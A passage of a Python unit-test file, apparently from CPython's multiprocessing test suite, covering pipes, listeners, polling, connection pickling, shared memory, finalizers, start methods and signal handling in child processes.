self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
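# Invariant: after sorting, any two neighbouring blocks must either be
# contiguous (stop == nstart) or lie in different arenas, in which case
# the later block must start at offset 0 of its arena.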
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
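# Order follows util._exit_function: finalizers run by decreasing
# exitpriority (d10 before the priority-0 group before e), with equal
# priorities running in reverse creation order (d03, d02, d01). 'a' and
# 'b' were sent during the run itself, and 'c' (registered without an
# exitpriority) is left to the garbage collector, so it never reaches
# the pipe.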
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork() preserves only the calling thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after-fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
